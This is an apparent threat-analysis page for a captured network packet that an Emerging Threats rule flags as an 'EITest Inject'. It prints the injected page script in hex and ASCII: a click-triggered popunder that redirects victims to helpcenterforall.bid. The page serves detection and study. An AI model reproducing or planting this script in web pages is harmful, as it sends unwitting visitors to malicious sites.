« Back to Threat Assessment « Previous Threat | Next Threat »

EITest Inject July 25 2017 detected in 2017-10-21-traffic-analysis-exercise.pcap

Time Packet Protocol Source Destination Additional Threats Follow
2017/10/21 05:02:28 +0000 7322 TCP 104.18.61.210:80 (United States) 10.0.1.95:61209 source | dest | ip pair stream

Payload (2644 bytes) show as: hex | ascii

00000000 00000010 00000020 00000030 00000040 00000050 00000060 00000070 00000080 00000090 000000A0 000000B0 000000C0 000000D0 000000E0 000000F0 00000100 00000110 00000120 00000130 00000140 00000150 00000160 00000170 00000180 00000190 000001A0 000001B0 000001C0 000001D0 000001E0 000001F0 00000200 00000210 00000220 00000230 00000240 00000250 00000260 00000270 00000280 00000290 000002A0 000002B0 000002C0 000002D0 000002E0 000002F0 00000300 00000310 00000320 00000330 00000340 00000350 00000360 00000370 00000380 00000390 000003A0 000003B0 000003C0 000003D0 000003E0 000003F0 00000400 00000410 00000420 00000430 00000440 00000450 00000460 00000470 00000480 00000490 000004A0 000004B0 000004C0 000004D0 000004E0 000004F0 00000500 00000510 00000520 00000530 00000540 00000550 00000560 00000570 00000580 00000590 000005A0 000005B0 000005C0 000005D0 000005E0 000005F0 00000600 00000610 00000620 00000630 00000640 00000650 00000660 00000670 00000680 00000690 000006A0 000006B0 000006C0 000006D0 000006E0 000006F0 00000700 00000710 00000720 00000730 00000740 00000750 00000760 00000770 00000780 00000790 000007A0 000007B0 000007C0 000007D0 000007E0 000007F0 00000800 00000810 00000820 00000830 00000840 00000850 00000860 00000870 00000880 00000890 000008A0 000008B0 000008C0 000008D0 000008E0 000008F0 00000900 00000910 00000920 00000930 00000940 00000950 00000960 00000970 00000980 00000990 000009A0 000009B0 000009C0 000009D0 000009E0 000009F0 00000A00 00000A10 00000A20 00000A30 00000A40 00000A50
20 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 61 6e 61 6c 79 74 69 63 73 2e 6a 73 27 2c 27 67 61 27 29 3b 0a 0a 20 20 67 61 28 27 63 72 65 61 74 65 27 2c 20 27 55 41 2d 36 31 35 33 35 33 37 34 2d 31 27 2c 20 27 61 75 74 6f 27 29 3b 0a 20 20 67 61 28 27 73 65 6e 64 27 2c 20 27 70 61 67 65 76 69 65 77 27 29 3b 3c 2f 73 63 72 69 70 74 3e 20 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 47 65 74 57 69 6e 64 6f 77 48 65 69 67 68 74 28 29 7b 76 61 72 20 61 3d 30 3b 72 65 74 75 72 6e 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 5f 54 6f 70 2e 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 3f 61 3d 5f 54 6f 70 2e 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 3a 5f 54 6f 70 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 5f 54 6f 70 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 3f 61 3d 5f 54 6f 70 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 3a 5f 54 6f 70 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 26 26 5f 54 6f 70 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 26 26 28 61 3d 5f 54 6f 70 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 29 2c 61 7d 66 75 6e 63 74 69 6f 6e 20 47 65 74 57 69 6e 64 6f 77 57 69 64 74 68 28 29 7b 76 61 72 20 61 3d 30 3b 72 65 74 75 72 6e 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 5f 54 6f 70 2e 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3f 61 3d 5f 54 6f 70 2e 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3a 5f 54 6f 70 2e 64 0d 0a 37 66 36 0d 0a 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 5f 54 6f 70 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 57 69 64 74 68 3f 61 3d 5f 54 6f 70 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 57 69 64 74 68 3a 5f 54 6f 70 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 26 26 5f 54 6f 70 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 69 65 6e 74 57 69 64 74 68 26 26 28 61 3d 5f 54 6f 70 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 69 65 6e 74 57 69 64 74 68 29 2c 61 7d 66 75 6e 63 74 69 6f 6e 20 47 65 74 57 69 6e 64 6f 77 54 6f 70 28 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 5f 54 6f 70 2e 77 69 6e 64 6f 77 2e 73 63 72 65 65 6e 54 6f 70 3f 5f 54 6f 70 2e 77 69 6e 64 6f 77 2e 73 63 72 65 65 6e 54 6f 70 3a 5f 54 6f 70 2e 77 69 6e 64 6f 77 2e 73 63 72 65 65 6e 59 7d 66 75 6e 63 74 69 6f 6e 20 47 65 74 57 69 6e 64 6f 77 4c 65 66 74 28 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 5f 54 6f 70 2e 77 69 6e 64 6f 77 2e 73 63 72 65 65 6e 4c 65 66 74 3f 5f 54 6f 70 2e 77 69 6e 64 6f 77 2e 73 63 72 65 65 6e 4c 65 66 74 3a 5f 54 6f 70 2e 77 69 6e 64 6f 77 2e 73 63 72 65 65 6e 58 7d 66 75 6e 63 74 69 6f 6e 20 64 6f 4f 70 65 6e 28 75 72 6c 29 7b 76 61 72 20 70 6f 70 55 52 4c 3d 22 61 62 6f 75 74 3a 62 6c 61 6e 6b 22 2c 70 6f 70 49 44 3d 22 61 64 5f 22 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 38 39 39 39 39 39 39 39 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 65 37 29 2c 70 78 4c 65 66 74 3d 30 2c 70 78 54 6f 70 3d 30 3b 69 66 28 70 78 4c 65 66 74 3d 47 65 74 57 69 6e 64 6f 77 4c 65 66 74 28 29 2b 47 65 74 57 69 6e 64 6f 77 57 69 64 74 68 28 29 2f 32 2d 50 6f 70 57 69 64 74 68 2f 32 2c 70 78 54 6f 70 3d 47 65 74 57 69 6e 64 6f 77 54 6f 70 28 29 2b 47 65 74 57 69 6e 64 6f 77 48 65 69 67 68 74 28 29 2f 32 2d 50 6f 70 48 65 69 67 68 74 2f 32 2c 31 3d 3d 70 75 53 68 6f 77 6e 29 72 65 74 75 72 6e 21 30 3b 76 61 72 20 50 6f 70 57 69 6e 3d 5f 54 6f 70 2e 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 70 6f 70 55 52 4c 2c 70 6f 70 49 44 2c 22 74 6f 6f 6c 62 61 72 3d 30 2c 73 63 72 6f 6c 6c 62 61 72 73 3d 31 2c 6c 6f 63 61 74 69 6f 6e 3d 31 2c 73 74 61 74 75 73 62 61 72 3d 31 2c 6d 65 6e 75 62 61 72 3d 30 2c 72 65 73 69 7a 61 62 6c 65 3d 31 2c 74 6f 70 3d 22 2b 70 78 54 6f 70 2b 22 2c 6c 65 66 74 3d 22 2b 70 78 4c 65 66 74 2b 22 2c 77 69 64 74 68 3d 22 2b 50 6f 70 57 69 64 74 68 2b 22 2c 68 65 69 67 68 74 3d 22 2b 50 6f 70 48 65 69 67 68 74 29 3b 72 65 74 75 72 6e 20 50 6f 70 57 69 6e 26 26 28 70 75 53 68 6f 77 6e 3d 21 30 2c 30 3d 3d 50 6f 70 46 6f 63 75 73 26 26 28 50 6f 70 57 69 6e 2e 62 6c 75 72 28 29 2c 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 61 70 70 6c 65 77 65 62 6b 69 74 22 29 3e 2d 31 26 26 28 5f 54 6f 70 2e 77 69 6e 64 6f 77 2e 62 6c 75 72 28 29 2c 5f 54 6f 70 2e 77 69 6e 64 6f 77 2e 66 6f 63 75 73 28 29 29 29 2c 50 6f 70 57 69 6e 2e 49 6e 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 74 68 28 65 29 50 61 72 61 6d 73 3d 65 2e 50 61 72 61 6d 73 2c 4d 61 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 76 6f 69 64 20 30 21 3d 3d 77 69 6e 64 6f 77 2e 6d 6f 7a 50 61 69 6e 74 43 6f 75 6e 74 29 7b 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 22 61 62 6f 75 74 3a 62 6c 61 6e 6b 22 29 2e 63 6c 6f 73 65 28 29 7d 76 61 72 20 62 3d 50 61 72 61 6d 73 2e 50 6f 70 55 52 4c 3b 74 72 79 7b 6f 70 65 6e 65 72 2e 77 69 6e 64 6f 77 2e 66 6f 63 75 73 28 29 7d 63 61 74 63 68 28 61 29 7b 7d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 3d 62 7d 2c 4d 61 69 6e 28 29 7d 2c 50 6f 70 57 69 6e 2e 50 61 72 61 6d 73 3d 7b 50 6f 70 55 52 4c 3a 75 72 6c 7d 2c 50 6f 70 57 69 6e 2e 49 6e 69 74 28 50 6f 70 57 69 6e 29 29 2c 50 6f 70 57 69 6e 7d 66 75 6e 63 74 69 6f 6e 20 73 65 74 43 6f 6f 6b 69 65 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 6e 65 77 20 44 61 74 65 3b 64 2e 73 65 74 54 69 6d 65 28 64 2e 67 65 74 54 69 6d 65 28 29 2b 63 29 2c 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 61 2b 22 3d 22 2b 62 2b 22 3b 20 70 61 74 68 3d 2f 3b 3b 20 65 78 70 69 72 65 73 3d 22 2b 64 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 7d 66 75 6e 63 74 69 6f 6e 20 67 65 74 43 6f 6f 6b 69 65 28 61 29 7b 66 6f 72 28 76 61 72 20 63 2c 64 2c 65 2c 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 74 6f 53 74 72 69 6e 67 28 29 2e 73 70 6c 69 74 28 22 3b 20 22 29 2c 66 3d 30 3b 66 3c 62 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 69 66 28 63 3d 62 5b 66 5d 2e 73 70 6c 69 74 28 22 3d 22 29 2c 64 3d 63 5b 30 5d 2c 65 3d 63 5b 31 5d 2c 64 3d 3d 61 29 72 65 74 75 72 6e 20 65 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 69 6e 69 74 50 75 28 29 7b 69 66 28 5f 54 6f 70 3d 73 65 6c 66 2c 74 6f 70 21 3d 73 65 6c 66 29 74 72 79 7b 74 6f 70 2e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 28 29 26 26 28 5f 54 6f 70 3d 74 6f 70 29 7d 63 61 74 63 68 28 61 29 7b 7d 64 6f 63 75 6d 65 6e 74 2e 61 74 74 61 63 68 45 76 65 6e 74 3f 64 6f 63 75 6d 65 6e 74 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 63 6c 69 63 6b 22 2c 63 68 65 63 6b 54 61 72 67 65 74 29 3a 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 26 26 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 63 68 65 63 6b 54 61 72 67 65 74 2c 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 54 61 72 67 65 74 28 61 29 7b 69 66 28 21 67 65 74 43 6f 6f 6b 69 65 28 22 70 6f 70 75 6e 64 72 22 29 29 7b 76 61 72 20 61 3d 61 7c 7c 77 69 6e 64 6f 77 2e 65 76 65 6e 74 3b 64 6f 4f 70 65 6e 28 22 68 74 74 70 3a 2f 2f 68 65 6c 70 63 65 6e 74 65 72 66 6f 72 61 6c 6c 2e 62 69 64 2f 69 6e 64 65 78 2f 3f 4d 43 50 4b 56 38 22 29 3b 73 65 74 43 6f 6f 6b 69 65 28 22 70 6f 70 75 6e 64 72 22 2c 31 2c 38 36 34 65 35 29 7d 7d 76 61 72 20 70 75 53 68 6f 77 6e 3d 21 31 2c 50 6f 70 57 69 64 74 68 3d 31 33 37 30 2c 50 6f 70 48 65 69 67 68 74 3d 38 30 30 2c 50 6f 70 46 6f 63 75 73 3d 30 2c 5f 54 6f 70 3d 6e 75 6c 6c 3b 69 6e 69 74 50 75 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
})(window,docum ent,'script','// www.google-analy tics.com/analyti cs.js','ga');.. ga('create', 'U A-61535374-1', ' auto');. ga('se nd', 'pageview') ;</script> <scri pt>function GetW indowHeight(){va r a=0;return"num ber"==typeof _To p.window.innerHe ight?a=_Top.wind ow.innerHeight:_ Top.document.doc umentElement&&_T op.document.docu mentElement.clie ntHeight?a=_Top. document.documen tElement.clientH eight:_Top.docum ent.body&&_Top.d ocument.body.cli entHeight&&(a=_T op.document.body .clientHeight),a }function GetWin dowWidth(){var a =0;return"number "==typeof _Top.w indow.innerWidth ?a=_Top.window.i nnerWidth:_Top.d ..7f6..ocument.d ocumentElement&& _Top.document.do cumentElement.cl ientWidth?a=_Top .document.docume ntElement.client Width:_Top.docum ent.body&&_Top.d ocument.body.cli entWidth&&(a=_To p.document.body. clientWidth),a}f unction GetWindo wTop(){return vo id 0!=_Top.windo w.screenTop?_Top .window.screenTo p:_Top.window.sc reenY}function G etWindowLeft(){r eturn void 0!=_T op.window.screen Left?_Top.window .screenLeft:_Top .window.screenX} function doOpen( url){var popURL= "about:blank",po pID="ad_"+Math.f loor(89999999*Ma th.random()+1e7) ,pxLeft=0,pxTop= 0;if(pxLeft=GetW indowLeft()+GetW indowWidth()/2-P opWidth/2,pxTop= GetWindowTop()+G etWindowHeight() /2-PopHeight/2,1 ==puShown)return !0;var PopWin=_T op.window.open(p opURL,popID,"too lbar=0,scrollbar s=1,location=1,s tatusbar=1,menub ar=0,resizable=1 ,top="+pxTop+",l eft="+pxLeft+",w idth="+PopWidth+ ",height="+PopHe ight);return Pop Win&&(puShown=!0 ,0==PopFocus&&(P opWin.blur(),nav igator.userAgent .toLowerCase().i ndexOf("appleweb kit")>-1&&(_Top. window.blur(),_T op.window.focus( ))),PopWin.Init= function(e){with (e)Params=e.Para ms,Main=function (){if(void 0!==w indow.mozPaintCo unt){window.open ("about:blank"). close()}var b=Pa rams.PopURL;try{ opener.window.fo cus()}catch(a){} window.location= b},Main()},PopWi n.Params={PopURL :url},PopWin.Ini t(PopWin)),PopWi n}function setCo okie(a,b,c){var d=new Date;d.set Time(d.getTime() +c),document.coo kie=a+"="+b+"; p ath=/;; expires= "+d.toGMTString( )}function getCo okie(a){for(var c,d,e,b=document .cookie.toString ().split("; "),f =0;f<b.length;f+ +)if(c=b[f].spli t("="),d=c[0],e= c[1],d==a)return e;return null}f unction initPu() {if(_Top=self,to p!=self)try{top. document.locatio n.toString()&&(_ Top=top)}catch(a ){}document.atta chEvent?document .attachEvent("on click",checkTarg et):document.add EventListener&&d ocument.addEvent Listener("click" ,checkTarget,!1) }function checkT arget(a){if(!get Cookie("popundr" )){var a=a||wind ow.event;doOpen( "http://helpcent erforall.bid/ind ex/?MCPKV8");set Cookie("popundr" ,1,864e5)}}var p uShown=!1,PopWid th=1370,PopHeigh t=800,PopFocus=0 ,_Top=null;initP u();</script>.</ body></html>...0 ....

1 Alert

Alerts provided by Emerging Threats 2020-05-29
Signature SID.rev RuleSet
1 EITest Inject July 25 2017 2024493.3 ET CURRENT_EVENTS

External References

There are no references available for these alerts.